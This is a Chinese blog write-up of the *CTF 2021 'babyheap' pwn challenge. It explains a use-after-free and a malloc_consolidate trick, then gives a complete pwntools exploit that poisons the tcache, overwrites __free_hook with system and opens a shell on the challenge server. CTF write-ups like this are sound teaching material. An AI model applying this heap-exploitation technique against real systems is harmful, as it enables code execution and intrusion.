*CTF 2021 PWN babyheap WriteUp

最新推荐文章于 2022-06-28 18:37:24 发布
最新推荐文章于 2022-06-28 18:37:24 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: PWN WP 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37422196/article/details/112790718
版权

前言

比赛的时候看到这道题就放弃了(哭~~)
主要还是堆学艺不精 (畏难)
赛后认真思考,其实很快就出来了

我们可怜的FPGA:

惨不忍睹


没办法我们真的太菜了
说实话我觉得赛后能做出来也很给队伍长脸了

*CTF 2021 PWN babyheap WriteUp

PWN中的全场最水题(但像我这种菜鸡比赛时都没做出来)

程序分析

在这里插入图片描述
全保护

常规堆题的菜单式

在这里插入图片描述

一些奇奇怪怪的地方:

  1. add功能可以覆盖之前的指针
    在这里插入图片描述
  2. delete有UAF
    在这里插入图片描述
  3. edit功能居然是从+8偏移开始写的!(这里一开始让我人都傻了)
    在这里插入图片描述

当然还有题目里也说了,libc版本是2.27也就是说有tcache
如果真有不知道什么是tcache的可以参看:

  • https://ctf-wiki.org/pwn/linux/glibc-heap/implementation/tcache/
  • https://ctf-wiki.org/pwn/linux/glibc-heap/tcache_attack/

整体思路

一开始当然是想常规修改tcache链表指针,结果发现edit从+8偏移开始写
突然懵逼
再者add功能中限制了堆块大小,没有small bins可用
突然就真的不知所措

你想吗,大小没法变化,一个萝卜一个坑,没有溢出,写不了指针
于是开始怀疑人生

后来突然想起曾在网上看到过关于malloc_consolidate的介绍

参考:

  • https://ctf-wiki.org/pwn/linux/glibc-heap/implementation/malloc_state/
  • https://www.dazhuanlan.com/2019/10/16/5da624b635caa/

这玩意儿居然能合并fast bins!
再看触发条件:

  1. malloc large bin
  2. top chunk不够空间
  3. free堆块并前后合并后,大小大于FASTBIN_CONSOLIDATION_THRESHOLD=65536

再看到leave_name功能:
在这里插入图片描述

0x400=1024>1008,属于large bins范围,可用于条件1触发malloc_consolidate
利用tcache同一bin最多7个堆块的性质,我们可以同时将8个堆块丢入fast bin(理论上最多9个,留一个防合并)

触发前:

在这里插入图片描述

触发后:

在这里插入图片描述

于是再去add大小不为0x70的堆块利用错位即可得到main_arena的地址并更改tcache链表指针
将其修改为 __free_hook地址
最后delete一个内容为/bin/sh的堆块即可

Exploit

from pwn import *
# from LibcTool import *
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
sh=remote('52.152.231.198',8081)
# sh=process('./pwn')
# attach(sh)
# raw_input()

def add(index,size):
	sh.sendlineafter('>>','1')
	sh.sendlineafter('input index',str(index))
	sh.sendlineafter('input size',str(size))
def delete(index):
	sh.sendlineafter('>>','2')
	sh.sendlineafter('input index',str(index))
def edit(index,content):
	sh.sendlineafter('>>','3')
	sh.sendlineafter('input index',str(index))
	sh.sendafter('input content',content)
def show(index):
	sh.sendlineafter('>>','4')
	sh.sendlineafter('input index\n',str(index))
	return sh.recvuntil('\n1. add')[:-7]
def leave_name(name):
	sh.sendlineafter('>>','5')
	sh.sendafter('your name:',name)
def show_name():
	sh.sendlineafter('>>','6')

for i in range(15):
	add(i,0x60)
add(15,0x60)
for i in range(15):
	delete(i)
leave_name('lrcno6')
raw_input()
main_arena=u64(show(7).ljust(8,'\0'))-976
libc_base=main_arena-0x3ebc40
add(14,0x20-8)
add(11,0x20-8)
raw_input()
delete(11)
edit(7,flat('a'*0x10,0x21,libc_base+libc.sym['__free_hook']-8))
add(13,0x20-8)
add(12,0x20-8)
edit(12,p64(libc_base+libc.sym['system']))
edit(7,flat('a'*0x10,0x21,'/bin/sh'))
delete(11)

sh.interactive()
sh.close()

后记

最开始没意识到可以用leave_name功能来malloc large bin chunk,而是想去把top chunk榨干
也不是不可以 也就add个那么1000多次
结果发现远程运行时根本跑不动,直接被alarm遣送
还是看到CY2CS的WP才恍然大明白
果然还是太菜

简单介绍下我们FPGA:

我们是YaliFPGA战队
队员都是在读高中生(多可爱)
长期在各大线上赛上与诸水友队并列垫底
也曾有巨佬 然后都被高考吃掉了
剩下的都是菜鸡(其中我最菜)
参加过湖湘杯,全国大学生等多项(线上)赛事并垫底
也曾有大佬去过XMan(然后被高考吃掉了)
也曾拿过一血 (然后倒数第二)

希望大家能认识我们FPGA战队,也希望我们能得到各位大佬的帮助

lrcno6
2021.1.19

lrcno6_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2417
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 501
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
*ctf 2021 babyheap
z1r0的博客
06-28 221
查看保护 漏洞点在delete这里,存在一个uaf漏洞。 libc题目用的是2.27-3ubuntu1.4,笔者用的2.27-3ubuntu1.5. 这个题目需要注意的是edit的方式 大小是size - 8,是从heap_ptr - 8处开始,所以edit不可以直接修改fd。因为创建名字的时候可以使用0x400大小的size,所以考虑fastbin_dup_consolidate实现泄露libc和overlapping 注意一下edit方式就行了,exp如下...
2017 0ctf babyheap
wuyvle的博客
07-26 1061
之前学习了一下lager bins的构建,今天来学习一下堆重叠和堆扩展 先找漏洞点 这里没有对大小进行检查,可以输入任意字节,存在字节溢出 此题的难点在于如何泄露libc,由于add使用calloc的原因,当堆块从bins中拿出来时,会清空堆块 很明显我们要申请大的堆块进入unsorted bins来使main_aren+88写在堆块上,我们可以使上一个堆块扩展到这个堆块上来进行泄露 先贴上exp from pwn import * context.log_level = 'debug' context.u
[GKCTF 2021]babycat
08-11 746
这道题点开始注册登录界面,但是点击注册按钮会提示Not Allowed。 但是查看源码会发现 这里是直接跳出了Not Allowed,构造POST请求,通过burp发包注册一个账号。 注册成功,登录后又上传和下载两个功能,我们发现下载有一个目录穿越,尝试读取,/WEB-INF/web.xml. 由于上传功能只有管理员可以使用它,因此可以根据xml的内容构造出, ../../WEB-INF/classes/com/web/servlet/registerServlet.class,...
BUUCTF 每日打卡 2021-8-7
weixin_52446095的博客
08-07 208
引言 无 [watevrCTF 2019]ECC-RSA 看到标题就有点怕了,ECC椭圆曲线加密,学过一点皮毛,没做过题,找wp 加密代码如下: from fastecdsa.curve import P521 as Curve from fastecdsa.point import Point from Crypto.Util.number import bytes_to_long, isPrime from os import urandom from random import getrandbits
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
pwn栈溢出10道练习题有writeup
01-04
在网络安全领域,"pwn" 是一个常见的术语,通常用于指代与系统漏洞利用和控制权获取相关的挑战。...通过这些题目和writeup,你可以逐步提升在pwn领域的技能,为参与CTF比赛或进行安全研究打下坚实基础。
writeup:CTF的不同形式的报告库
03-09
2. **Maquinas Pwn**:Maquinas Pwn可能是CTF比赛中的一种虚拟机系列,参与者需要通过利用软件漏洞来控制或“攻破”这些虚拟机。这类挑战对于练习实际的系统渗透测试技巧非常有价值,因为它们模拟了真实世界的攻击...
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
starctf2021:* CTF2021的官方源代码和内容
03-20
starctf2021 * CTF2021的官方源代码和内容
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
CTF题解NO.00006】*CTF2021 - pwn - write up by arttnba3
arttnba3的博客
01-23 617
github blog addr 【CTF题解NO.00006】*CTF2021 - pwn - write up by arttnba3[github blog addr](https://arttnba3.cn/2021/01/20/CTF-0X03-STARCTF2021-PWN/)0x00.绪论0x01.babyheap - Use After Free + tcache poisoning0x02.babygame - double free + tcache poisoning0x03.baby
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3085
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4331
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
2021*CTF部分wp
re1wn
01-30 1136
一个废话连篇思路不清的wp,后续会完善
*CTF2021部分复现
SopRomeo的博客
01-20 1427
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
*ctf 2021 StArNDBOX
feng的博客
04-20 460
前言 一道也是要手写opcode的题目,其实目前的理解感觉有些懵懂,但是至少对于题目的基本原理也是懂了,学到了很多。 WP 源码: pragma solidity ^0.5.11; library Math { function invMod(int256 _x, int256 _pp) internal pure returns (int) { int u3 = _x; int v3 = _pp; int u1 = 1; int v
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5040
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
学习ctfpwn的网址
最新发布
03-15
当涉及到学习CTF(Capture The Flag)和Pwn(漏洞利用)的时候,以下是一些常用的网址和资源推荐: 1. CTFtime:https://ctftime.org/ - CTFtime是一个CTF竞赛的信息平台,你可以在这里找到各种CTF比赛的信息、题目和解答。 2. Pwnable.kr:http://pwnable.kr/ - Pwnable.kr是一个专注于Pwn题目的在线平台,****** CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ - CTF Wiki是一个开放的CTF知识库,包含了各种CTF相关的知识、技巧和工具的介绍和使用方法。 5. CTF365:https://ctf365.com/ - CTF365是一个在线的CTF训练平台,提供了各种类型的CTF题目供学习和挑战。 6. CTFlearn:https://ctflearn.com/ - CTFlearn是一个面向初学者的CTF学习平台,*********!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值